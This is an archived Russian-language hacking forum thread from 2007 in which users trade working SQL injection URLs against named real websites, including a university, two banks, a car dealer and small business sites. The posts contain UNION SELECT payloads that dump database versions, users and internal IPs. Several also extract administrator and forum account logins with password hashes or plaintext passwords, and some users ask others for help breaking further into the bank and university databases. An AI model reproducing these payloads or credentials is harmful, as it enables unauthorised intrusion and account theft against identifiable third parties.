ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3311  
Старый 15.10.2007, 01:51
cheb
Познающий
Регистрация: 31.07.2006
Сообщений: 46
Провел на форуме:
596615

Репутация: 18
По умолчанию

Новосибирский государственный университет :
http://www.nsu.ru/dynamic/news/news_view.php?news_mode=single&news_user=user&news _action=view&news_id=-3244+union+select+user(),database(),3,4,5,6,7,8/*
Хоть там и дофига всяких форумов, я не смог вытянуть от туда ни одной таблицы. Может ктото добрым советом поможет ?
 
Ответить с цитированием

  #3312  
Старый 15.10.2007, 17:17
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

Инвестиционный городской банк ( Новосибирск )
Цитата:
http://www.mb-icb.ru/page.php?-private'/* */union/**/select/**/1,2,3,4,VERSION(),6,7,8,9, 10,11,12/*
Version: 4.0.13
User: olmi@localhost

Не смог подобрать таблицы, кто сможет, не скупитесь выкладывайте либо здесь, либо, на крайняк, в ПМ, может быть существует доступ к information_schema но идет фильтр на символ "." - точка
 
Ответить с цитированием

  #3313  
Старый 15.10.2007, 17:57
delay(0)
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343

Репутация: 141
По умолчанию

0nep@t0p, в 4 версии этой базы нету.
 
Ответить с цитированием

  #3314  
Старый 15.10.2007, 18:28
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

mazda-auto.ru


http://www.mazda-auto.ru/mazdainfo.php?fl=1&sl=8&qid=-503+union+select+1,2,3,concat(version(),0x3a,datab ase(),0x3a,user()),5,6/*

1. 5.0.45-log:u38612:u38612@10.10.223.222


http://www.mazda-auto.ru/mazdainfo.php?fl=1&sl=8&qid=-503+union+select+1,2,3,concat(username,0x2F,user_p assword,0x2F,user_icq),5,6+from+phpbb_users/*

логин\хеш\уин
 
Ответить с цитированием

  #3315  
Старый 15.10.2007, 19:18
Heavy Metal
Новичок
Регистрация: 16.09.2007
Сообщений: 25
Провел на форуме:
120760

Репутация: 62
Отправить сообщение для Heavy Metal с помощью ICQ
По умолчанию

Код:
http://www.blackrhino.biz/browse.phtml?by=category&cat_id=-1+union+select+aes_decrypt(aes_encrypt(concat_ws(0x3a,username,password,email),31),31)+from+login+limit+0,2/*
http://www.rosart.biz/index.phtml?categoryID=-1+union+select+concat_ws(0x3a,0x223e,login,password)+from+users+limit+0,1/*
 
Ответить с цитированием

  #3316  
Старый 15.10.2007, 19:43
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

fkclub.ru


http://fkclub.ru/index.php?page=showarticle&id=-13+union+select+concat(version(),0x3a,database(),0 x3a,user()),2,3,4/*

4.1.22:ru10000_fkclub:ru10000_mysql@194.85.90.130

http://fkclub.ru/index.php?page=showarticle&id=-13+union+select+concat(username,0x2F,user_password ,0x2F,user_icq),2,3,4+from+phpbb_users+limit+6,1/*

логин\хеш\уин

----------------------------------------------

http://www.paradive.ru/diving/news/index.html?view_id=-1'+union+select+1,concat(version(),0x2F,user()),3, 4,5/*

5.0.22/sabotag@localhost
 
Ответить с цитированием

  #3317  
Старый 15.10.2007, 20:15
v1ru$
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
Провел на форуме:
3766085

Репутация: 576
Отправить сообщение для v1ru$ с помощью ICQ
По умолчанию

Первая успешно проведённая скуль,а всего вторая.Ногами не пинать)
Код:
http://sant exnika.ru/brands.html?id=-228+UNION+SELECT+1,conc  at(version(),0x3a,data base(),0x3a,user()),3,4,5,6,7,8,9/*
5.0.45:u35457:u35457@10.10.12.116
Таблицы
Код:
http://san texnika.ru/brands.html?id=-228%20UNION%20SELECT%201,table _name,3,4,5,6,7,8,9%20from%20information_sch ema.tables/*&kp=all
Столбцы
Код:
http://santex  nika.ru/brands.html?id=-228%20UNION%20SELECT%201,column_name,3,4,5,6,7,8,9%20from%20information_schema.columns/*&kp=all
Админ
Код:
http://santexn ika.ru/brands.html?id=-228+UNION+SELECT+1,concat(logi n,0x3a, password,0x3a,email),3,4,5,6,7,8,9+from+ users/*
admin:$1$oJ$lZmJWDleYk
santexnika:$1$H0$9elwV.6Pn8

Админку не нашёл

Последний раз редактировалось v1ru$; 15.10.2007 в 20:17..
 
Ответить с цитированием

  #3318  
Старый 15.10.2007, 20:29
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
По умолчанию

Код:
http://www.spb-center.ru/content.php?id=-1'+union+select+concat(user( ),0x3a,version(),0x3a,database())/*
Uwww3046S@localhost:4.0.26-log:udb3046
Код:
http://www.meleuz.ru/index.php?text_id=news&id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6 /*&PHPSESSID=dc258c69b267e9f170975144ed5f6c99
meleuz90_base@v29.valuehost.ru:4.0.27-max-log:meleuz90_base
Код:
http://moscowmaps.ru/index.php?aid=72&sid=112&text_id=-1+union+select+1,2,3,4,5,concat(login,0x3a,password)+from+administrators/*
asa:ltrf,hm anahal:univer
Код:
http://nagore.ru/default.php?section=sch&part=aro&article=178&text_id=-1+union+select+concat(name, 0x3a,login,0x3a,pass)+from+admins/*
admin:admin:parol test:test:test
Код:
http://fondsi.ru/default.php?to_show=shp&sub_id=&art_id=&text_id=-1+union+select+1,concat(login, 0x3a,password),3+from+administrators/*
admin:fondsi.ru mishasun:2038134 anahal:parol boss:faina vasek:bbs
Код:
http://drikung.ru/index.php?aid=36&sid=40&text_id=-1+union+select+1,2,3,4,5,concat(login,0x3a,password)+from+administrators+limit+0,1/*
admin:parol
 
Ответить с цитированием

  #3319  
Старый 15.10.2007, 20:56
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

dorama.ru


http://www.dorama.ru/?t=news&sm=news&nsid=-1+union+select+1,2,3,4,concat(version(),0x2F,datab ase(),0x2F,user()),6/*

5.0.21/doramaru/doramaru@81.177.16.41

http://www.dorama.ru/?t=news&sm=news&nsid=-1+union+select+1,2,3,4,concat(username,0x2F,user_p assword,0x2F,user_icq),6+from+phpbb_users+limit+4, 1/*

логин\хеш\уин
 
Ответить с цитированием

  #3320  
Старый 16.10.2007, 11:02
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

Международный Акционерный Банк
Цитата:
http://www.mab.ru/ru/services/crediting/?id=-54'+union+select+1,2,3,VERSION(),5,6/*
Version: 4.0.21-Max
User: mab@localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ